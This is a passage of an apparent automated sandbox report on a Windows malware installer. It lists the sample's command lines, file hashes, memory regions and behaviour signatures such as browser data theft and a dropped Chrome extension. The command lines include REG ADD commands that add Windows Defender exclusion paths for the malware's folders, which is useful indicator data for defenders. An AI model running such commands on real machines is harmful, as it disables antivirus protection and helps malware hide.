"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPZLeWFxT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YVKeAuHUOaLCRzVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:64

Network

Country Destination Domain Proto
NL 65.9.86.47:443 tcp

Files

memory/1380-54-0x00000000757A1000-0x00000000757A3000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

memory/824-56-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

\Users\Admin\AppData\Local\Temp\7zS166E.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

memory/936-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\7zS254D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/936-71-0x0000000010000000-0x0000000011000000-memory.dmp

memory/2028-74-0x0000000000000000-mapping.dmp

memory/1328-75-0x0000000000000000-mapping.dmp

memory/1440-78-0x0000000000000000-mapping.dmp

memory/1376-79-0x0000000000000000-mapping.dmp

memory/288-83-0x0000000000000000-mapping.dmp

memory/960-82-0x0000000000000000-mapping.dmp

memory/1580-86-0x0000000000000000-mapping.dmp

memory/592-87-0x0000000000000000-mapping.dmp

memory/780-90-0x0000000000000000-mapping.dmp

memory/1600-92-0x0000000000000000-mapping.dmp

memory/396-94-0x0000000000000000-mapping.dmp

memory/396-95-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

memory/396-96-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

memory/396-97-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

memory/396-98-0x0000000002564000-0x0000000002567000-memory.dmp

memory/964-99-0x0000000000000000-mapping.dmp

memory/396-101-0x000000000256B000-0x000000000258A000-memory.dmp

memory/396-100-0x0000000002564000-0x0000000002567000-memory.dmp

memory/848-102-0x0000000000000000-mapping.dmp

memory/1956-104-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

memory/852-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rdCtdiR.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/1728-114-0x0000000000000000-mapping.dmp

memory/880-115-0x0000000000000000-mapping.dmp

memory/780-116-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e4e81e7383459810e5f9e82ddcca41bc
SHA1 b000cad6a086d689094a8c868399e1cff283b5e5
SHA256 6ea7933650b6818d2994dcd12103b1e908b8bd9c60f9add973ad1cdc8e31deb7
SHA512 5847469a675bd63818ca9cc29690aac80b3324d86070b8cd48b79bc72dfccb3206c3285da9166b76958d0ed0f931e028bcea319d6c622f95787fcd50c2a58b6c

memory/780-119-0x000007FEF3CE0000-0x000007FEF4703000-memory.dmp

memory/780-120-0x000007FEF3180000-0x000007FEF3CDD000-memory.dmp

memory/1276-121-0x0000000000000000-mapping.dmp

memory/780-123-0x000000000244B000-0x000000000246A000-memory.dmp

memory/780-122-0x0000000002444000-0x0000000002447000-memory.dmp

memory/780-124-0x000000000244B000-0x000000000246A000-memory.dmp

memory/1136-125-0x0000000000000000-mapping.dmp

memory/1780-126-0x0000000000000000-mapping.dmp

memory/2032-127-0x0000000000000000-mapping.dmp

memory/1956-128-0x0000000000000000-mapping.dmp

memory/1696-129-0x0000000000000000-mapping.dmp

memory/2008-130-0x0000000000000000-mapping.dmp

memory/820-131-0x0000000000000000-mapping.dmp

memory/2040-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9c77d8d247582bde507e5eda19a4c85b
SHA1 15d02d823170cd49647e30d7c2ed0750d02eda6a
SHA256 b44cdeea23015a0120aa1880f81f24fc64edcd841d49dbe112739e3b6d52c482
SHA512 52acb02f85ae54e28905aab40981f18d1948d3ba8467bf4d39c9963414b7547529abf7753cb31fabeb8c8126f6ceea4eb4fde4f3a3838dd7284b381cf21dcba1

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2040-136-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

memory/2040-137-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

memory/2040-139-0x000000000251B000-0x000000000253A000-memory.dmp

memory/2040-138-0x0000000002514000-0x0000000002517000-memory.dmp

memory/1092-140-0x0000000000000000-mapping.dmp

memory/2040-141-0x0000000002514000-0x0000000002517000-memory.dmp

memory/2040-142-0x000000000251B000-0x000000000253A000-memory.dmp

memory/912-143-0x0000000000000000-mapping.dmp

memory/1916-144-0x0000000000000000-mapping.dmp

memory/1620-145-0x0000000000000000-mapping.dmp

memory/992-146-0x0000000000000000-mapping.dmp

memory/1368-147-0x0000000000000000-mapping.dmp

memory/1948-148-0x0000000000000000-mapping.dmp

memory/1276-149-0x0000000000000000-mapping.dmp

memory/1768-150-0x0000000000000000-mapping.dmp

memory/700-151-0x0000000000000000-mapping.dmp

memory/548-152-0x0000000000000000-mapping.dmp

memory/1780-153-0x0000000000000000-mapping.dmp

C:\Windows\Temp\grMXAHIUMHIHAuvw\tlGPTreK\nLZuwYiwYzzlmmqI.wsf

MD5 0b1e51c9a8b95b9209826b2be06ff26f
SHA1 986bea32d6107f964de3a5f8525ee4cb522780b8
SHA256 80a1b9947818cfece8b24e8458bff8f3a85feb235849315f21be745c2d24cf5b
SHA512 4d0600c981e1cce2479cd6e56025bae003a817fd0f5bda20a9f93b0846d94b269dbd319809ac125e71fdd116ff7ad576ddc7e6d5c197a0c4b3124297c2029e76

memory/1188-156-0x0000000000000000-mapping.dmp

memory/544-157-0x0000000000000000-mapping.dmp

memory/1056-158-0x0000000000000000-mapping.dmp

memory/1440-159-0x0000000000000000-mapping.dmp

memory/1376-160-0x0000000000000000-mapping.dmp

memory/2040-161-0x0000000000000000-mapping.dmp

memory/1124-162-0x0000000000000000-mapping.dmp

memory/1908-163-0x0000000000000000-mapping.dmp

memory/1652-164-0x0000000000000000-mapping.dmp

memory/1700-165-0x0000000000000000-mapping.dmp

memory/1972-166-0x0000000000000000-mapping.dmp

memory/1472-167-0x0000000000000000-mapping.dmp

memory/1648-168-0x0000000000000000-mapping.dmp

memory/812-169-0x0000000000000000-mapping.dmp

memory/276-170-0x0000000000000000-mapping.dmp

memory/1720-171-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-10-31 22:05

Reported

2022-10-31 22:07

Platform

win10v2004-20220812-en

Max time kernel

82s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\ikgbzwgbjtdRP.dll C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File created C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe N/A
